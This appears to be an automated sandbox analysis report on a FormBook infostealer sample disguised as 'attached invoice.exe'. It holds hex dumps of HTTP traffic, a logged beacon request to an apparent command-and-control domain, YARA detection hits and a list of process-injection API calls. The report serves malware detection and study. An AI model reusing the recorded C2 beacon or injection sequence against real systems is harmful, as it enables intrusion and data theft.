                                                                                                  Date: Tue, 03 Dec 2024 08:53:22 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58296
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67403337-e3b8"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:53:22.262485027 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:53:22.262579918 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:53:22.262598991 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:53:22.262614965 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                  Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                  Dec 3, 2024 09:53:22.262629986 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                  Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                  Dec 3, 2024 09:53:22.262641907 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:53:22.262739897 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                  Dec 3, 2024 09:53:22.262784004 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                  Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                  Dec 3, 2024 09:53:22.262800932 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                  Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  93192.168.11.304996043.156.176.25380
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:53:24.782480955 CET413OUTGET /vz2d/?6aonl5x=xnuAwqhG0E1cgnLHCuPG8putHNvOywveoj5D04lQyE1r/ADkIFYhezZZAVu20e8okSIJRDKdbgbPnaZH6+cIwh3xzWT5SsSVbw2mIitnDZbRgyAsQQEm3mk=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.kmmm759j.sbs
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:53:25.118073940 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:53:24 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58296
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67403337-e3b8"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:53:25.118132114 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:53:25.118175983 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:53:25.118218899 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:53:25.118261099 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                  Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                  Dec 3, 2024 09:53:25.118303061 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                  Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                  Dec 3, 2024 09:53:25.118335962 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:53:25.118381977 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                  Dec 3, 2024 09:53:25.118427038 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                  Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                  Dec 3, 2024 09:53:25.118470907 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                  Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                                  Dec 3, 2024 09:53:25.452255011 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                                  Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:03:46:32
                                                                                                  Start date:03/12/2024
                                                                                                  Path:C:\Users\user\Desktop\attached invoice.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\attached invoice.exe"
                                                                                                  Imagebase:0xb40000
                                                                                                  File size:764'928 bytes
                                                                                                  MD5 hash:D367DF87FA58083DBD4A3E0337F3B1B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:03:46:49
                                                                                                  Start date:03/12/2024
                                                                                                  Path:C:\Users\user\Desktop\attached invoice.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\attached invoice.exe"
                                                                                                  Imagebase:0xd20000
                                                                                                  File size:764'928 bytes
                                                                                                  MD5 hash:D367DF87FA58083DBD4A3E0337F3B1B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.811798316588.0000000006CB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:03:47:20
                                                                                                  Start date:03/12/2024
                                                                                                  Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                  Imagebase:0x140000000
                                                                                                  File size:16'696'840 bytes
                                                                                                  MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:6
                                                                                                  Start time:03:47:21
                                                                                                  Start date:03/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                                                                  Imagebase:0x710000
                                                                                                  File size:27'648 bytes
                                                                                                  MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.815527565060.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.815527779212.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:03:47:46
                                                                                                  Start date:03/12/2024
                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                  Imagebase:0x7ff77cd20000
                                                                                                  File size:675'744 bytes
                                                                                                  MD5 hash:7B12552FD2A5948256B20EC97B708F94
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:19.3%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:18
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph 11011 2e4eed0 11012 2e4ef1c WriteProcessMemory 11011->11012 11014 2e4efbb 11012->11014 11015 2e4e750 11016 2e4e794 ResumeThread 11015->11016 11018 2e4e7e6 11016->11018 11019 2e4f030 11020 2e4f07c ReadProcessMemory 11019->11020 11022 2e4f0fa 11020->11022 11003 2e4eda8 11004 2e4edec VirtualAllocEx 11003->11004 11006 2e4ee6a 11004->11006 11007 2e4f268 11008 2e4f2ef CreateProcessA 11007->11008 11010 2e4f54d 11008->11010 11023 2e4ec78 11024 2e4ecc1 Wow64SetThreadContext 11023->11024 11026 2e4ed3f 11024->11026

                                                                                                    Executed Functions

                                                                                                    Function 02E4F25C Relevance: 1.8, APIs: 1, Instructions: 326processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
